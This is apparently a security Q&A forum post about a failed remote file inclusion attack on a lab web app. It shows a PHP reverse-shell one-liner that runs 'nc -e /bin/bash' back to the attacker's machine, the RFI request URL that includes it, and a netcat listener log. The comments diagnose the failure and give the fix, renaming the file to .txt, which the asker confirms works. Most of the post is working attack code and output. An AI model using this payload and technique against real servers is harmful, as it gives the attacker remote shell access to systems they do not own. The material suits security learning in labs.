# Problem with reverse-shell direction

Tags: shellcode

In an attempt to exploit RFI weakness I am running Apache on my Kali box to host the php reverse-shell and the shell was backconnect to myself (my kali machine).

Why am I getting a shell from my Kali machine instead of the target web server?

**The php reverse shell: shell.php**

`<?php echo shell_exec('nc -e /bin/bash <Kali IP> 4444'); ?>`

**The RFI exploitation:**

`http://<Target IP>/vulnerabilities/fi/?page=http://<Kali IP>/shell.php`

When I run:

```
nc -nlvp 4444
connect to [192.168.60.2] from (UNKNOWN) [192.168.60.2] 46654
hostname 
kali
```

Comment: Hold on, you host the `shell.php` on your Kali box, which opens a shell with a connection to your Kali box. You link to this *external page* from your Apache box, and you get a shell to your Kali box. Yes. That's how it is supposed to work. You are running a shell on your Kali box. The Apache box does not magically grab the code from the external page and run it locally.

Comment: Why the code run locally and not from the target web server (192.168.235.36)  ?

Comment: Because what you are seeing is not an RFI vulnerability. You are seeing an open redirect. RFI requires that the remote code is *included* locally, which is not happening here.

Comment: Maybe try changing shell.php to shell.txt.

Comment: Its work after I changed the ext to shell.txt. Can you explain why it works only in txt?